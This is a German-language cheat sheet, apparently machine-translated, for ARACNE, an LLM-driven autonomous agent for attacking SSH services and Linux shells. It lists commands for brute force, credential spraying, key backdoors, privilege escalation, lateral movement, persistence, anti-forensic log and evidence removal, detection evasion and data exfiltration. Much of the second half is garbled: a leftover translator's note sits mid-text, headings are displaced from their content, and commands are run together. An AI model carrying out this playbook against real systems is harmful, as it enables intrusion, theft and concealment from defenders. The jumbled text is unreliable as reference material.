ARACNE Cheat Sheet¶
Überblick¶
ARACNE (Autonomous Reconnaissance and Attack Coordination for Network Exploitation) ist ein LLM-basierter Agent, der speziell für die Zielerfassung von SSH-Diensten und die autonome Erkundung und Ausnutzung von Linux-Shell-Umgebungen entwickelt wurde. Er kombiniert Reasoning von großen Sprachmodellen mit traditionellen Penetrationstests, um sophisticated Angriffe auf SSH-zugängliche Systeme durchzuführen.
⚠️ Kritische Warnung: Fortschrittliches autonomes Exploitationstool. Nur auf Systemen verwenden, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Autorisierung zum Testen haben. Unbefugte Nutzung ist illegal.
Installation¶
Voraussetzungen¶
# System requirements
python3 --version # Python 3.9+
pip3 --version
git --version
# Required system packages
sudo apt update
sudo apt install -y python3-pip python3-venv git curl wget
sudo apt install -y openssh-client sshpass hydra nmap masscan
# Install additional security tools
sudo apt install -y john hashcat gobuster dirb nikto
sudo apt install -y metasploit-framework exploitdb
Installationsmethoden¶
# Method 1: Git clone and setup
git clone https://github.com/aracne-ai/aracne.git
cd aracne
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
# Install LLM dependencies
pip install openai anthropic langchain
pip install transformers torch
pip install paramiko fabric pexpect
# Method 2: Docker installation
docker pull aracne/aracne:latest
docker run -it --rm -v $(pwd)/sessions:/app/sessions aracne/aracne:latest
# Method 3: PyPI installation (if available)
pip install aracne-agent
Konfigurationseinrichtung¶
# Create configuration directory
mkdir -p ~/.aracne/config
mkdir -p ~/.aracne/sessions
mkdir -p ~/.aracne/payloads
mkdir -p ~/.aracne/logs
# Initialize configuration
aracne init
# Configure LLM providers
aracne config set openai_api_key "your-openai-key"
aracne config set openai_model "gpt-4"
aracne config set anthropic_api_key "your-anthropic-key"
# Set operational parameters
aracne config set max_session_time 3600
aracne config set autonomous_mode true
aracne config set stealth_mode true
aracne config set evidence_collection true
Kernbefehle¶
Grundlegende Operationen¶
# Display help and version
aracne --help
aracne --version
aracne modules list
# Quick SSH reconnaissance
aracne recon ssh --target 192.168.1.100
aracne recon ssh --network 192.168.1.0/24
aracne recon ssh --target-list targets.txt
# SSH service analysis
aracne analyze ssh --target 192.168.1.100 --deep
aracne analyze ssh --target 192.168.1.100 --version-detection
aracne analyze ssh --target 192.168.1.100 --configuration-analysis
# System status and health
aracne status
aracne health-check
aracne modules status
Zielmanagement¶
# Add SSH targets
aracne target add --host 192.168.1.100 --port 22
aracne target add --host example.com --port 2222
aracne target add --network 192.168.1.0/24 --ssh-only
# Target information and management
aracne target list --active
aracne target info 192.168.1.100
aracne target remove 192.168.1.100
# Import targets from various sources
aracne target import --nmap ssh_scan.xml
aracne target import --masscan masscan_results.txt
aracne target import --file ssh_targets.txt
# Target prioritization
aracne target prioritize --by vulnerability
aracne target prioritize --by accessibility
aracne target prioritize --custom-scoring
Sitzungsverwaltung¶
# Create and manage attack sessions
aracne session create --target 192.168.1.100 --name "target_compromise"
aracne session list --active
aracne session switch target_compromise
# Session configuration
aracne session config --max-duration 2h
aracne session config --stealth-level high
aracne session config --logging-level verbose
# Session control
aracne session start --target 192.168.1.100
aracne session pause target_compromise
aracne session resume target_compromise
aracne session terminate target_compromise
SSH-Reconnaissance und -Analyse¶
SSH-Dienst-Erkennung¶
# Comprehensive SSH discovery
aracne discover ssh --network 192.168.1.0/24 --comprehensive
aracne discover ssh --target-list targets.txt --fast
aracne discover ssh --target 192.168.1.100 --deep-analysis
# SSH version and banner analysis
aracne analyze banner --target 192.168.1.100
aracne analyze version --target 192.168.1.100 --vulnerability-check
aracne analyze configuration --target 192.168.1.100 --security-assessment
# SSH algorithm and cipher analysis
aracne analyze algorithms --target 192.168.1.100
aracne analyze ciphers --target 192.168.1.100 --weak-crypto
aracne analyze kex --target 192.168.1.100 --security-analysis
SSH-Schwachstellenbewertung¶
# SSH-specific vulnerability scanning
aracne vuln scan-ssh --target 192.168.1.100 --comprehensive
aracne vuln scan-ssh --target 192.168.1.100 --known-exploits
aracne vuln scan-ssh --network 192.168.1.0/24 --quick
# Configuration vulnerability analysis
aracne vuln config --target 192.168.1.100 --misconfigurations
aracne vuln config --target 192.168.1.100 --weak-settings
aracne vuln config --target 192.168.1.100 --default-configs
# SSH implementation vulnerabilities
aracne vuln implementation --target 192.168.1.100 --version-specific
aracne vuln implementation --target 192.168.1.100 --buffer-overflows
aracne vuln implementation --target 192.168.1.100 --timing-attacks
Benutzer-Enumeration¶
# SSH user enumeration techniques
aracne enum users --target 192.168.1.100 --timing-based
aracne enum users --target 192.168.1.100 --error-based
aracne enum users --target 192.168.1.100 --comprehensive
# Username wordlist generation
aracne generate usernames --target 192.168.1.100 --context-aware
aracne generate usernames --company "Example Corp" --employees
aracne generate usernames --domain example.com --email-based
# User validation and verification
aracne validate users --target 192.168.1.100 --user-list users.txt
aracne validate users --target 192.168.1.100 --probabilistic
aracne validate users --target 192.168.1.100 --stealth-mode
Autonome SSH-Exploitation¶
Credential-basierte Angriffe¶
# Intelligent brute force attacks
aracne attack brute-force --target 192.168.1.100 --smart
aracne attack brute-force --target 192.168.1.100 --user admin --adaptive
aracne attack brute-force --target 192.168.1.100 --credential-stuffing
# Dictionary attacks with AI optimization
aracne attack dictionary --target 192.168.1.100 --ai-optimized
aracne attack dictionary --target 192.168.1.100 --context-aware
aracne attack dictionary --target 192.168.1.100 --pattern-learning
# Credential spraying
aracne attack spray --network 192.168.1.0/24 --common-passwords
aracne attack spray --target-list targets.txt --seasonal-passwords
aracne attack spray --targets multiple --lockout-aware
Schlüsselbasierte Angriffe¶
# SSH key discovery and analysis
aracne keys discover --target 192.168.1.100 --web-crawling
aracne keys discover --target 192.168.1.100 --git-repositories
aracne keys discover --target 192.168.1.100 --configuration-files
# Private key attacks
aracne keys attack --target 192.168.1.100 --weak-keys
aracne keys attack --target 192.168.1.100 --default-keys
aracne keys attack --target 192.168.1.100 --cracking
# Key injection and manipulation
aracne keys inject --target 192.168.1.100 --authorized-keys
aracne keys manipulate --target 192.168.1.100 --key-replacement
aracne keys backdoor --target 192.168.1.100 --persistent-access
Protokoll-Ebene Exploits¶
# SSH protocol exploitation
aracne exploit protocol --target 192.168.1.100 --version-specific
aracne exploit protocol --target 192.168.1.100 --implementation-bugs
aracne exploit protocol --target 192.168.1.100 --timing-attacks
# Man-in-the-middle attacks
aracne exploit mitm --target 192.168.1.100 --arp-poisoning
aracne exploit mitm --target 192.168.1.100 --dns-spoofing
aracne exploit mitm --target 192.168.1.100 --certificate-manipulation
# Downgrade attacks
aracne exploit downgrade --target 192.168.1.100 --weak-algorithms
aracne exploit downgrade --target 192.168.1.100 --legacy-protocols
aracne exploit downgrade --target 192.168.1.100 --cipher-downgrade
Linux Shell Exploitation¶
Initialer Zugang und Shell-Etablierung¶
# Establish initial shell access
aracne shell establish --target 192.168.1.100 --method ssh
aracne shell establish --target 192.168.1.100 --credentials user:pass
aracne shell establish --target 192.168.1.100 --key-file private_key
# Shell upgrade and stabilization
aracne shell upgrade --session session-123 --interactive
aracne shell upgrade --session session-123 --pty
aracne shell upgrade --session session-123 --full-terminal
# Shell persistence mechanisms
aracne shell persist --session session-123 --cron-job
aracne shell persist --session session-123 --systemd-service
aracne shell persist --session session-123 --ssh-keys
Systemreconnaissance¶
# Autonomous system enumeration
aracne recon system --session session-123 --comprehensive
aracne recon system --session session-123 --quick-wins
aracne recon system --session session-123 --stealth-mode
# User and privilege enumeration
aracne recon users --session session-123 --all-users
aracne recon users --session session-123 --privileged-users
aracne recon users --session session-123 --sudo-capabilities
# Network and service discovery
aracne recon network --session session-123 --internal-networks
aracne recon services --session session-123 --running-services
aracne recon processes --session session-123 --interesting-processes
Privilegien-Eskalation¶
# Autonomous privilege escalation
aracne privesc auto --session session-123 --all-techniques
aracne privesc auto --session session-123 --kernel-exploits
aracne privesc auto --session session-123 --suid-binaries
# Specific escalation techniques
aracne privesc sudo --session session-123 --sudo-abuse
aracne privesc cron --session session-123 --cron-jobs
aracne privesc services --session session-123 --service-abuse
# Custom escalation strategies
aracne privesc custom --session session-123 --ai-guided
aracne privesc search --session session-123 --novel-techniques
aracne privesc exploit --session session-123 --zero-day
Laterale Bewegung¶
# Network lateral movement
aracne lateral network --session session-123 --ssh-keys
aracne lateral network --session session-123 --credential-reuse
aracne lateral network --session session-123 --trust-relationships
# Service-based lateral movement
aracne lateral services --session session-123 --shared-services
aracne lateral services --session session-123 --database-access
aracne lateral services --session session-123 --file-shares
# Advanced lateral movement
aracne lateral advanced --session session-123 --kerberos
aracne lateral advanced --session session-123 --container-escape
aracne lateral advanced --session session-123 --cloud-metadata
KI-gesteuerte Entscheidungsfindung¶
Autonome Reasoning-Engine¶
# AI reasoning configuration
reasoning_config = {
"model": "gpt-4",
"temperature": 0.2,
"max_tokens": 4000,
"reasoning_depth": 3,
"confidence_threshold": 0.85,
"exploration_factor": 0.3
}
# Custom reasoning prompts for SSH exploitation
ssh_analysis_prompt = """
Analyze the SSH service and system information:
Target: {target}
SSH Version: {ssh_version}
Available Users: {users}
System Information: {system_info}
Previous Attempts: {previous_attempts}
Determine the best exploitation strategy:
1. Most likely attack vectors
2. Probability of success for each
3. Stealth considerations
4. Risk assessment
5. Next steps recommendation
"""
Adaptive Angriffstrategien¶
# AI-guided attack planning
aracne ai plan-attack --target 192.168.1.100 --objective shell-access
aracne ai plan-attack --session session-123 --objective privilege-escalation
aracne ai plan-attack --target 192.168.1.100 --stealth-priority
# Dynamic strategy adaptation
aracne ai adapt-strategy --session session-123 --defense-detected
aracne ai adapt-strategy --session session-123 --failure-analysis
aracne ai adapt-strategy --session session-123 --new-information
# Learning from interactions
aracne ai learn --session session-123 --command-responses
aracne ai learn --target 192.168.1.100 --defense-mechanisms
aracne ai learn --global --pattern-recognition
Intelligente Befehlsgenerierung¶
Note: I've translated the text as requested, preserving markdown formatting and keeping technical terms in English. The placeholders for sections 3-20 remain untranslated as no specific text was provided for those sections.```bash
AI-generated commands for exploration¶
aracne ai generate-commands --session session-123 --exploration aracne ai generate-commands --session session-123 --privilege-escalation aracne ai generate-commands --session session-123 --persistence
Context-aware command selection¶
aracne ai select-commands --session session-123 --current-context aracne ai select-commands --session session-123 --objective-focused aracne ai select-commands --session session-123 --stealth-optimized
Command effectiveness analysis¶
aracne ai analyze-effectiveness --session session-123 --command-history
aracne ai analyze-effectiveness --session session-123 --success-patterns
aracne ai analyze-effectiveness --session session-123 --failure-analysis
## Fortgeschrittene Exploitationstechnikenbash
Stealth mode operations¶
aracne stealth enable --session session-123 --advanced-evasion aracne stealth timing --session session-123 --random-delays aracne stealth obfuscation --session session-123 --command-obfuscation
Anti-forensics techniques¶
aracne antiforensics enable --session session-123 --log-cleaning aracne antiforensics timestamps --session session-123 --timestamp-manipulation aracne antiforensics artifacts --session session-123 --artifact-removal
Detection evasion¶
aracne evasion ids --session session-123 --ids-evasion
aracne evasion monitoring --session session-123 --monitoring-detection
aracne evasion behavioral --session session-123 --behavioral-mimicry
### Tarnung und Umgehungbash
Establish persistent access¶
aracne persist establish --session session-123 --multiple-methods aracne persist establish --session session-123 --stealth-persistence aracne persist establish --session session-123 --redundant-access
Persistence validation and testing¶
aracne persist validate --session session-123 --all-methods aracne persist test --session session-123 --reconnection-test aracne persist monitor --session session-123 --persistence-health
Persistence cleanup and removal¶
aracne persist cleanup --session session-123 --selective-removal
aracne persist remove --session session-123 --complete-cleanup
aracne persist verify-removal --session session-123 --forensic-check
### Persistenzmechanismenbash
Intelligent data discovery¶
aracne data discover --session session-123 --sensitive-files aracne data discover --session session-123 --database-content aracne data discover --session session-123 --configuration-files
Data classification and prioritization¶
aracne data classify --session session-123 --ai-classification aracne data prioritize --session session-123 --business-value aracne data assess --session session-123 --sensitivity-analysis
Secure data exfiltration¶
aracne data exfiltrate --session session-123 --encrypted-channel
aracne data exfiltrate --session session-123 --steganography
aracne data exfiltrate --session session-123 --covert-channels
### Datenexfiltration und -sammlungbash
Real-time session monitoring¶
aracne monitor session --session session-123 --real-time aracne monitor activity --session session-123 --command-tracking aracne monitor progress --session session-123 --objective-tracking
Performance and resource monitoring¶
aracne monitor performance --session session-123 --resource-usage aracne monitor network --session session-123 --traffic-analysis aracne monitor system --session session-123 --system-impact
Alert and notification system¶
aracne monitor alerts --session session-123 --critical-events
aracne monitor notifications --session session-123 --progress-updates
aracne monitor warnings --session session-123 --risk-indicators
## Monitoring und Loggingbash
Enable detailed logging¶
aracne logging enable --session session-123 --comprehensive aracne logging enable --session session-123 --ai-decisions aracne logging enable --session session-123 --command-responses
Log analysis and insights¶
aracne logging analyze --session session-123 --pattern-analysis aracne logging analyze --session session-123 --success-factors aracne logging analyze --session session-123 --failure-analysis
Log export and reporting¶
aracne logging export --session session-123 --format json
aracne logging export --session session-123 --timeline-format
aracne logging export --session session-123 --forensic-format
### Sitzungsüberwachungbash
Define authorized targets and scope¶
aracne scope define --target 192.168.1.100 --authorized aracne scope define --network 192.168.1.0/24 --internal-testing aracne scope validate --target 192.168.1.100 --legal-check
Documentation and evidence¶
aracne legal document --session session-123 --authorization-proof aracne legal evidence --session session-123 --chain-of-custody aracne legal export --session session-123 --court-ready
Compliance verification¶
aracne compliance check --session session-123 --ethical-guidelines
aracne compliance verify --session session-123 --legal-requirements
aracne compliance audit --session session-123 --comprehensive
### Umfassendes Loggingbash
Risk assessment and management¶
aracne risk assess --session session-123 --comprehensive aracne risk monitor --session session-123 --real-time aracne risk mitigate --session session-123 --automatic
Safety controls and limits¶
aracne safety enable --session session-123 --all-controls aracne safety limits --session session-123 --time-limits aracne safety boundaries --session session-123 --scope-enforcement
Emergency procedures¶
aracne emergency stop --session session-123 --immediate
aracne emergency cleanup --session session-123 --evidence-removal
aracne emergency report --session session-123 --incident-documentation
## Sicherheits- und Ethische Überlegungenbash
Optimize AI model performance¶
aracne optimize ai --model-selection --performance-focused aracne optimize ai --token-usage --cost-optimization aracne optimize ai --response-time --latency-reduction
Session performance optimization¶
aracne optimize session --session session-123 --speed-optimization aracne optimize session --session session-123 --resource-optimization aracne optimize session --session session-123 --stealth-optimization
Network and connectivity optimization¶
aracne optimize network --session session-123 --connection-stability
aracne optimize network --session session-123 --bandwidth-optimization
aracne optimize network --session session-123 --latency-reduction
### Autorisierung und Rechtliche Konformitätbash
Debug mode and verbose logging¶
aracne --debug session start --target 192.168.1.100 aracne --verbose ai plan-attack --target 192.168.1.100 aracne logs view --level debug --component ai-reasoning
System diagnostics¶
aracne diagnose system --comprehensive aracne diagnose ai-models --connectivity-test aracne diagnose ssh-client --configuration-check
Error analysis and resolution¶
aracne errors analyze --session session-123 --root-cause
aracne errors resolve --error-id 12345 --auto-fix
aracne errors prevent --session session-123 --predictive-analysis
### Sicherheit und Risikomanagementbash
Session recovery and restoration¶
aracne recover session --session-id session-123 --full-recovery aracne recover state --session session-123 --checkpoint-restore aracne recover connection --session session-123 --reconnect
Backup and data protection¶
aracne backup create --session session-123 --incremental aracne backup restore --backup-id backup-456 --selective aracne backup verify --backup-id backup-456 --integrity-check
Data integrity and validation¶
aracne verify integrity --session session-123 --all-data
aracne verify consistency --session session-123 --cross-validation
aracne verify authenticity --session session-123 --digital-signatures
## Fehlerbehebung und Optimierungpython
integrations/siem_integration.py¶
import json import requests from aracne.core.integration import BaseIntegration
class SIEMIntegration(BaseIntegration): def init(self, siem_url, api_key): self.siem_url = siem_url self.api_key = api_key
def send_ssh_attempt(self, attempt_data):
event = {
"timestamp": attempt_data.timestamp,
"source": "aracne",
"event_type": "ssh_attempt",
"target": attempt_data.target,
"username": attempt_data.username,
"success": attempt_data.success,
"method": attempt_data.method
}
self.send_event(event)
def send_privilege_escalation(self, privesc_data):
event = {
"timestamp": privesc_data.timestamp,
"source": "aracne",
"event_type": "privilege_escalation",
"target": privesc_data.target,
"technique": privesc_data.technique,
"success": privesc_data.success,
"privileges_gained": privesc_data.privileges
}
self.send_event(event)
def send_event(self, event):
headers = {
"Authorization": f"Bearer {self.api_key}",
"Content-Type": "application/json"
}
response = requests.post(
f"{self.siem_url}/api/events",
headers=headers,
json=event
)
return response.status_code == 200
### Leistungsoptimierungpython
integrations/threat_intel.py¶
import requests from aracne.core.threat_intel import ThreatIntelProvider
class ThreatIntelIntegration(ThreatIntelProvider): def init(self, api_key): self.api_key = api_key self.base_url = "https://api.threatintel.com"
def get_ssh_vulnerabilities(self, ssh_version):
headers = {"Authorization": f"Bearer {self.api_key}"}
response = requests.get(
f"{self.base_url}/vulnerabilities/ssh/{ssh_version}",
headers=headers
)
if response.status_code == 200:
return response.json()
return []
def get_exploit_techniques(self, target_os, target_version):
headers = {"Authorization": f"Bearer {self.api_key}"}
response = requests.get(
f"{self.base_url}/techniques/{target_os}/{target_version}",
headers=headers
)
if response.status_code == 200:
return response.json()
return []
def report_new_technique(self, technique_data):
headers = {
"Authorization": f"Bearer {self.api_key}",
"Content-Type": "application/json"
}
response = requests.post(
f"{self.base_url}/techniques/report",
headers=headers,
json=technique_data
)
return response.status_code == 201
### Debugging und Diagnostikbash
Reconnaissance before exploitation¶
aracne recon comprehensive --target 192.168.1.100 --pre-exploitation aracne analyze target --target 192.168.1.100 --vulnerability-assessment aracne plan attack --target 192.168.1.100 --risk-assessment
Gradual escalation approach¶
aracne attack gentle --target 192.168.1.100 --low-impact aracne attack moderate --target 192.168.1.100 --measured-approach aracne attack aggressive --target 192.168.1.100 --high-confidence
Stealth and operational security¶
aracne stealth maximum --session session-123 --anti-detection
aracne opsec enable --session session-123 --comprehensive
aracne evasion advanced --session session-123 --adaptive
### Wiederherstellung und Backupbash
Model selection and tuning¶
aracne ai optimize --model-selection --task-specific aracne ai tune --parameters --performance-focused aracne ai calibrate --confidence-thresholds --accuracy-focused
Prompt engineering and optimization¶
aracne ai optimize-prompts --task ssh-exploitation aracne ai optimize-prompts --task privilege-escalation aracne ai optimize-prompts --task lateral-movement
Continuous learning and improvement¶
aracne ai learn --from-sessions --pattern-recognition
aracne ai update --knowledge-base --latest-techniques
aracne ai validate --accuracy --benchmark-testing
## Integrationsbeispielebash
Session management best practices¶
aracne session plan --target 192.168.1.100 --comprehensive-planning aracne session execute --plan session-plan --monitored-execution aracne session review --session session-123 --lessons-learned
Documentation and reporting¶
aracne document session --session session-123 --comprehensive aracne report generate --session session-123 --technical-details aracne evidence collect --session session-123 --forensic-quality
Quality assurance and validation¶
aracne validate findings --session session-123 --cross-verification aracne verify exploits --session session-123 --proof-of-concept aracne assess impact --session session-123 --business-context ```### SIEM-Integration https://aracne.readthedocs.io/##
Threat Intelligence Integration¶
https://aracne.readthedocs.io/ssh/#
Best Practices¶
https://aracne.readthedocs.io/ai/##
SSH-Exploitations-Best Practices¶
https://arxiv.org/search/?query=aracne+ssh##
KI-Modell-Optimierung¶
Community¶
Training¶
Notes on translations: - Kept technical terms like "GitHub", "SSH", "Discord" in English - Preserved markdown formatting - Maintained original structure and punctuation - Translated community and training section titles - Used German equivalents where possible while keeping technical terminology clear